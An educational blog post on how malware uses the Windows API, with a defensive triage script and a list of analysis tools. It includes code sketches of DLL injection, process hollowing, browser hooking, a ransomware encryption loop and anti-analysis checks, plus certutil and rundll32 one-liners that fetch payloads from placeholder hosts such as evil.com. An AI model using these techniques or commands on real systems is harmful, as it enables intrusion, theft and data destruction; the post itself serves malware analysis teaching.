# Windows API in Malware: Family Patterns and Analysis
>[!Security]
>Always analyse malware in a secure, isolated environment like the one we built in our [[Azure Malware Lab Design]] series. The patterns and techniques discussed here are for educational purposes only.
Ever wonder why malware analysts get excited when they spot certain API call sequences? It's like finding a criminal's fingerprints at a crime scene - these patterns can give us strong hints about which malware family we might be dealing with and what it's trying to do to our systems. While they're not always definitive - malware authors can and do copy techniques from each other - these API patterns often serve as valuable indicators during analysis.
If you're just getting started with Windows APIs, you might want to check out our [[Windows API Basics]] guide first. But if you're ready to dive into how malware authors use (and abuse) these APIs, you're in the right place!
## Understanding Malware API Patterns
Malware authors are a bit like chefs - they each have their favourite ingredients (APIs) and recipes (combinations of API calls) that they use to cook up their malicious code. Let's break down some common patterns and see what they tell us about different malware families.
### Process Manipulation Patterns
```cpp
// Classic DLL Injection Recipe
OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)
VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)
WriteProcessMemory(hProcess, lpAddress, (LPVOID)dllPath, dwSize, NULL)
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, lpAddress, 0, NULL)
// Process Hollowing - a more sophisticated dish
CreateProcessA(NULL, target, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)
NtUnmapViewOfSection(pi.hProcess, imageBase)
VirtualAllocEx(pi.hProcess, imageBase, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
WriteProcessMemory(pi.hProcess, imageBase, newImage, imageSize, NULL)
SetThreadContext(pi.hThread, &ctx)
ResumeThread(pi.hThread)
```
> 🔍 **Technical Detail**: Process hollowing involves more than just these steps - there's also the tricky business of getting the Process Environment Block (PEB) address (e.g., via the `FS` segment register on x86 or `GS` on x64) and tweaking the `ImageBaseAddress` field.
### Malware Family Signatures
Different malware families tend to have their own distinctive cooking styles. Here's what to look out for:
#### Banking Trojans (Think TrickBot, Zeus)
```cpp
// Their favourite recipe for hooking browser functions
// (Note: This is a simplified 5-byte inline hook example.
// Hooks can vary in size and complexity.)
typedef struct _HOOK_STRUCT {
BYTE original[5];
BYTE jump[5];
PVOID function;
} HOOK_STRUCT, *PHOOK_STRUCT;
// Browser injection - their signature move
VirtualProtect(targetFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect)
memcpy(hookStruct.original, targetFunction, 5)
hookStruct.jump[0] = 0xE9 // JMP instruction
*(DWORD*)(&hookStruct.jump[1]) = (DWORD)hookFunction - (DWORD)targetFunction - 5
memcpy(targetFunction, hookStruct.jump, 5)
```
#### Ransomware's Cookbook (WannaCry, Ryuk style)
```cpp
// Setting up their encryption kitchen
HCRYPTPROV hProv;
HCRYPTKEY hKey;
DWORD dwMode = CRYPT_MODE_CBC;
CryptAcquireContext(&hProv, NULL, MS_ENH_RSA_AES_PROV, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)
CryptGenKey(hProv, CALG_AES_256, CRYPT_EXPORTABLE, &hKey)
CryptSetKeyParam(hKey, KP_MODE, (BYTE*)&dwMode, 0)
// Hunting for files to encrypt
WIN32_FIND_DATA findData;
HANDLE hFind = FindFirstFile("*.*", &findData);
do {
HANDLE hFile = CreateFile(findData.cFileName,
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
// Encryption operations follow...
} while(FindNextFile(hFind, &findData));
```
### Modern Evasion Techniques
Just like cybersecurity professionals, malware authors are constantly upping their game. Here's what we're seeing in modern malware:
#### Dynamic API Resolution
```cpp
// A sneaky way to hide their intentions
typedef HMODULE (WINAPI *pLoadLibraryA)(LPCSTR);
typedef FARPROC (WINAPI *pGetProcAddress)(HMODULE, LPCSTR);
// Custom GetProcAddress implementation
FARPROC GetProcAddressCustom(HMODULE hModule, LPCSTR lpProcName) {
// ... clever API resolution logic (e.g., using PEB traversal
// to find modules and parse export tables) ...
}
```
#### Anti-Analysis Tricks
```cpp
// Trying to spot debuggers through timing
LARGE_INTEGER frequency, start, end;
QueryPerformanceFrequency(&frequency);
QueryPerformanceCounter(&start);
__debugbreak(); // They time this instruction - debuggers often pause execution here
QueryPerformanceCounter(&end);
double elapsed = (end.QuadPart - start.QuadPart) * 1000.0 / frequency.QuadPart;
if (elapsed > 0.1) { // Debugger spotted!
ExitProcess(0);
}
// Checking if they're in a VM
SYSTEM_INFO si;
GetSystemInfo(&si);
if (si.dwNumberOfProcessors < 2) { // Might be a VM
ExitProcess(0);
}
```
## Analysis Methodology
When you're hunting for these patterns, here's how to approach it:
### Static Analysis
1. **Import Table Analysis**
```cpp
// Looking at what they're importing
// Note: adding the RVA to moduleBase only works on an image that is mapped in memory;
// for a file on disk, translate the RVA to a file offset via the section headers first.
PIMAGE_IMPORT_DESCRIPTOR importDesc = (PIMAGE_IMPORT_DESCRIPTOR)((BYTE*)moduleBase +
    ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); // Get address of Import Directory
while (importDesc->Name) { // the descriptor array ends with an all-zero entry
    // Parse those imports... (e.g., walk importDesc->OriginalFirstThunk for the imported names and
    // importDesc->FirstThunk for the resolved addresses; the DLL name is at moduleBase + importDesc->Name)
    importDesc++;
}
```
2. **PE Header Analysis**
- Check for suspicious sections (high entropy = possible packing)
- Look at section permissions (executable data sections? suspicious!)
- Analyse header characteristics
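A small triage script that applies both static checks above to constructed sample data. It is added here as an example and is not code from the original post or from any of the tools listed below: it scores an import list against the API recipes from this article, flags a tiny import table that still carries LoadLibrary/GetProcAddress as a sign of dynamic API resolution, and checks section flags and Shannon entropy. The section flag constants are from winnt.h; the import lists and section contents are constructed samples, not real binaries.

```python
import math
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000  # section characteristic flags from winnt.h
IMAGE_SCN_MEM_WRITE = 0x80000000

# API "recipes" taken from the patterns in this article (A/W suffixes are folded off before matching)
RECIPES = {
    "dll_injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "process_hollowing": {"CreateProcess", "NtUnmapViewOfSection", "WriteProcessMemory", "SetThreadContext", "ResumeThread"},
    "ransomware_crypto": {"CryptAcquireContext", "CryptGenKey", "FindFirstFile", "FindNextFile"},
}

def fold(name):
    # CreateFileA and CreateFileW should both match the recipe entry "CreateFile"
    return name[:-1] if len(name) > 1 and name[-1] in "AW" else name

def match_recipes(imports, min_ratio=0.75):
    """Return {recipe: fraction of its APIs imported} for recipes at or above min_ratio."""
    names = {fold(n) for n in imports}
    ratios = {r: len(apis & names) / len(apis) for r, apis in RECIPES.items()}
    return {r: v for r, v in ratios.items() if v >= min_ratio}

def looks_dynamically_resolved(imports, max_imports=8):
    """A tiny import table that still has LoadLibrary + GetProcAddress suggests runtime API resolution."""
    names = {fold(n) for n in imports}
    return {"LoadLibrary", "GetProcAddress"} <= names and len(names) <= max_imports

def shannon_entropy(data):
    """Bits per byte (0.0 to 8.0); packed or encrypted sections usually score above 7."""
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in Counter(data).values()) if total else 0.0

def suspicious_sections(sections):
    """sections: iterable of (name, characteristics, raw_bytes); flags W+X and high-entropy sections."""
    findings = []
    for name, chars, data in sections:
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append((name, "writable+executable"))
        if shannon_entropy(data) > 7.0:
            findings.append((name, "high entropy (possible packing)"))
    return findings

# Constructed samples (not taken from real malware): an injector-style import list and a packed-looking PE
INJECTOR_IMPORTS = ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread", "ExitProcess"]
PACKED_IMPORTS = ["LoadLibraryA", "GetProcAddress", "VirtualProtect", "ExitProcess"]
PACKED_SECTIONS = [
    ("UPX0", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE, b"\x00" * 512),           # empty, low entropy
    ("UPX1", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE, bytes(range(256)) * 8),   # uniform bytes, entropy 8.0
]
```

Feed it the import names and section table a tool like PeStudio reports and the recipe coverage tells you which of the patterns above to go looking for in the disassembler.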
### Dynamic Analysis Configuration
Here's how to set up your tools:
#### Process Monitor Filters
```plaintext
Process Name is "suspicious.exe"
Operation is CreateFile
Operation is RegSetValue
Operation is TCP Send
Operation is TCP Receive
```
#### API Monitor Setup
```xml
<filter enabled="true">
<api module="kernel32.dll" name="CreateFileA"/>
<api module="kernel32.dll" name="WriteFile"/>
<api module="advapi32.dll" name="RegSetValueExA"/>
</filter>
```
## Latest Trends
The malware world never stands still. Here's what's trending:
1. **Living-off-the-Land (LOLBin) Abuse**
```shell
# Abusing legitimate Windows tools
certutil.exe -urlcache -split -f http://malicious.com/payload
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:http://evil.com/payload")
```
2. **Direct System Calls**
```nasm
;Bypassing API monitoring (Windows 10 x64)
;Note: Syscall numbers can vary between OS versions
__asm {
mov r10, rcx
mov eax, 0x3F ;NtCreateFile syscall number
syscall
ret
}
```
## Essential Analysis Tools
Your malware analysis toolkit should include:
### Static Analysis Champions
- **[PeStudio](https://www.winitor.com/)**:
  - Think of this as your initial triage tool. It's brilliant for getting a quick look at suspicious files without actually running them.
  - The latest version (9.35 as of 2024) has some really neat features for spotting dodgy PE files.
  - Perfect for when you're thinking "Is this file as suspicious as it looks?"
- **[Ghidra](https://ghidra-sre.org/)**: For deep-diving into the code
  - The NSA's gift to reverse engineers (yes, that NSA!)
  - Absolutely brilliant decompiler that turns machine code into something actually readable
  - Best part? It's completely free and open-source
- **Radare2/Cutter**:
  - Radare2: [https://rada.re/n/](https://rada.re/n/)
  - Cutter: [https://cutter.re/](https://cutter.re/)
  - If you love working from the command line, Radare2 is your new best friend
  - Not a CLI fan? No worries - Cutter gives you all the same power with a nice GUI
- **IDA Pro**: [https://hex-rays.com/ida-pro/](https://hex-rays.com/ida-pro/)
  - Sadly not completely open source, but it still has to be mentioned
  - The industry standard for years - it's like the Ferrari of disassemblers
  - Amazing decompiler (though that's a separate licence)
  - Not cheap (we're talking thousands), but if you're doing this professionally, it's worth every penny
  - Pro tip: There's a free version of IDA 7.0 floating around legally if you want to try it out
- **Binary Ninja**: [https://binary.ninja/](https://binary.ninja/)
  - The new kid on the block that's making waves
  - More budget-friendly than IDA Pro (but still not cheap)
  - Brilliant UI and some really clever features
  - Perfect middle ground between free tools and IDA Pro
### Dynamic Analysis Heroes
- **[Process Monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)**: Watch those API calls in real-time
- **[API Monitor](https://www.rohitab.com/apimonitor)**: Get detailed API call information
- **[Procmon](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)**: Your best mate for filesystem and registry operations (yes it's listed twice... it really is that good!)
- **[Process Hacker](https://processhacker.sourceforge.io/)**: Open source tooling for processes and system monitoring including advanced memory inspection capabilities.
- **[Cuckoo Sandbox](https://cuckoosandbox.org/index.html)**: Automated analysis in a safe environment... or follow our [[Azure Malware Lab Design]] guides.
>[!tip] Configure Process Monitor filters to focus on specific API calls - it'll save you from drowning in data!
## Debugging (When You Need to Get Your Hands Dirty)
- **x64dbg**: [https://x64dbg.com/](https://x64dbg.com/)
  - The open-source debugger that gives the commercial ones a run for their money
  - Fantastic community and loads of useful plugins
  - Perfect for when you need to step through code line by line
## Network Analysis (Watching the Traffic)
- **Wireshark**: [https://www.wireshark.org/](https://www.wireshark.org/)
  - The absolute king of packet analysis
  - If it's happening on your network, Wireshark can see it
  - Yeah, the interface looks a bit overwhelming at first, but you'll learn to love it
- **Fiddler**: [https://www.telerik.com/fiddler](https://www.telerik.com/fiddler)
  - Your go-to tool for web traffic analysis
  - Brilliant for seeing what malware's trying to download or where it's calling home to
  - Works with HTTPS traffic too, which is super handy these days
## Extra Resources (Because You Can Never Know Too Much)
### Documentation That Won't Put You to Sleep
- Windows API Docs: [https://learn.microsoft.com/en-us/windows/win32/api/](https://learn.microsoft.com/en-us/windows/win32/api/)
  - Microsoft's official docs - surprisingly readable!
- Malware Analysis Tutorials: [https://malwareunicorn.org/workshops/re101.html](https://malwareunicorn.org/workshops/re101.html)
  - Brilliant for beginners, still useful for pros
## Conclusion
Understanding API patterns is crucial for effective malware analysis. While the patterns we've discussed are common, remember that malware is constantly evolving. Always analyse with a critical eye and be ready to spot new variations.